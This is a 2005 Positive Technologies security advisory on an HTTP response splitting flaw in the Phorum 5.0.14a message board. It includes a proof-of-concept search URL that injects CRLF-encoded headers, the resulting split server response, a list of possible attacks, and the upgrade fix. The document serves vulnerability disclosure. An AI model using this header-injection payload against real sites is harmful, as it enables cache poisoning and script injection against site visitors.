[ Positive Technologies SA-20050322 ] Phorum "location" HTTP Response Splitting Vulnerability. Release Date: 03/22/2005 Date Reported: 03/10/2005 Severity: Medium Application: Phorum Platform: PHP Vendor: http://www.phorum.org Affects versions: 5.0.14a Other versions may also be affected. I. BACKGROUND Phorum is a web based message board written in PHP. Phorum is designed with high-availability and visitor ease of use in mind. Features such as mailing list integration, easy customization and simple installation make Phorum a powerful add-in to any website. II. DESCRIPTION Input passed to the "Location" parameter is not properly sanitised. This can be exploited to inject malicious characters into HTTP headers and may allow execution of arbitrary HTML and script code in a user's browser session in context of an affected site. Request: http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0aScanned by PTsecurity%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30 Result: HTTP/1.1 302 Found Date: Tue, 01 Mar 2005 12:33:53 GMT Server: Apache/1.3.31 (Unix) PHP/4.3.10 X-Powered-By: PHP/4.3.10 Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body= Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 34 Scanned by PTsecurity ,author=1,subject=1 Connection: close Content-Type: text/html <...> This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting). The vulnerability has been reported in Phorum version 5.0.14. Other versions may also be affected. III. ANALYSIS Exploitation of this vulnerability allows remote attackers to mount various kinds of attacks. For example: Cross-Site Scripting (XSS), Web Cache Poisoning (deface), Browser cache poisoning, Hijacking pages with user-specific information and etc... IV. SOLUTION Update to version 5.0.15a. http://phorum.org/story.php?48 http://phorum.org/downloads/phorum-5.0.15a.tar.gz